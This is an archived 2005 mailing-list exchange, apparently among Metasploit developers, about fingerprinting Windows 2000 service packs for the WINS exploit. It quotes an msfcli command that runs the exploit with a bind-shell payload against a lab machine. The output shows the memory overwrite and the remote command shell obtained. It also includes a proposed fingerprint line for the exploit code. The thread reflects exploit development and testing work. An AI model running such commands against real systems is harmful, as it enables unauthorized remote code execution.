WINS Fingerprint update

[hdm at metasploit.com (H D Moore)]

It is strange the those addresses are the same between service packs. They 
should point to a location inside ntdll.dll, which changes quite a bit 
between each SP of Windows 2000. If you get a chance, could you mail me a 
copy (off-list) of your ntdll.dll file? Thanks!

-HD


On Wednesday 12 January 2005 19:21, grutz at jingojango.net wrote:
> On Wed, Jan 12, 2005 at 02:47:31PM -0800, grutz at jingojango.net brazenly 
wrote:
> > I didn't have SP4 handy to put on the vm image.
>
> Just put SP4 on Win2KAS and results are the same:
>
> $ ./msfcli wins RHOST=192.168.191.10 PAYLOAD=win32_bind TARGET=0 E
> [*] Starting Bind Handler.
> [*] Pointers: [0x05371e90] 0x053dffa4 0x77f98191 0x77f89640
> [*] Attempting to overwrite 0x053df4c4 with 0x053922e0 (0x05391f40)
> [*] Got connection from 192.168.191.1:3773 <-> 192.168.191.10:4444
>
> Microsoft Windows 2000 [Version 5.00.2195]
> (C) Copyright 1985-2000 Microsoft Corp.
>
> C:\WINNT\system32>
>
> So for Win2KASsp3, added this line:
>
>  $sp = '3'   if $ptrs[3] == 0x77f81648;  # add for Win2K Advanced
> Server, SP3